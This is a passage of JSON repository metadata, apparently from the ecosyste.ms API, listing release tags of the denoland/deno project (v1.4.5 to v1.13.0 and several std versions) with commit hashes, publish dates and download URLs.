0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/d